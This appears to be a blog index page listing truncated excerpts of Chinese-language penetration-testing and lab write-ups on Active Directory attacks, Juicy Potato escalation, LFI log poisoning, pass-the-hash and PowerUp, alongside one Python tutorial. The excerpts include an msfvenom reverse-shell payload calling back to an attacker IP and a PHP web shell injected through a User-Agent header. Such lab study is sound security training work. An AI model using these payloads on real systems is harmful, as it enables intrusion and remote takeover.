Objective 17
任务• 在 dcorp 域中找到我们具有写入权限的计算机对象。• 滥用写入权限以域管理员身份访问该计算机。 Find-InterestingDomainAcl | ?{$_.identityreferencename -match 'ciadim'}空的 在Je...
Arctic Juicy Potato提权
拿到了反弹shell之后这种可以用Juciy Potato或者PrintSpoofer提权kali上制作木马msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.16.18 LPORT=3333 > systemreverse.batKali监听333...
/var/log/access.log 日志污染
目标IP 192.168.174.16当前有LFI漏洞 /meteor/index.php?page=且可以访问/var/log/access.log现在我们在User-Agent里插入php木马并运行<?php echo system($_GET['cmd']); ?>通过ps命令验...
Python类 基础
1. 类的定义1.1 设计类在程序中设计表格 我们称之为:设计类(class)class Student: name = None #记录学生姓名class是关键字,表示要定义类了类的属性,即定义在类中的变量(成员变量)类的行为...
w34kn3ss OpenSSL 0.9.8c-1 < 0.9.8g-9漏洞 python反编译
实验环境攻击者 Kali 192.168.192.128受害者 IP 192.168.192.187 Linux 1. 信息收集如果不把域名放入/etc/hosts的话 那么就掉到兔子洞里了所以把这个写入/etc/hosts中访问weakness.jth/| __ / ...
Flimsy
简介point 10Warm upDifficulty Easyrated by community INTERMEDIATE No more flimsy excuses 实验环境攻击者 Kali 192.168.45.200受害者 IP 192.168.200.220 Linux 1. 信息收集收集受...
Active Directory 中的横向移动3 哈希传递和Overpass The Hash
1. 哈希传递哈希传递 (PtH) 技术允许攻击者使用用户的 NTLM 哈希而不是关联的明文密码来对远程系统或服务进行身份验证。请注意,这不适用于 Kerberos 身份验证,而仅适用于使用 NTLM 身份验证的...
权限提升的自动化工具或脚本 PowerUp
1. 介绍PowerUp是一个Powershell程序,使用户能够枚举并潜在地利用针对Windows机器的特权升级机会PowerUp.ps1脚本是属于PowerSploit工具包的一个工具能够扫描并识别windows系统中的错误配置 2....
Active Directory 中的横向移动2 PsExec
PsExec 是一个非常通用的工具,是 Mark Russinovich 开发的 SysInternals套件的一部分。它旨在取代类似 telnet 的应用程序,并通过交互式控制台在其他系统上提供进程的远程执行。为了滥用该工具...
Objective 19
任务• 使用 DA 访问 dollarcorp.moneycorp.local,使用 dollarcorp 的 krbtgt 哈希将权限提升至企业管理员或 DA 至父域 moneycorp.local。 >C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rub...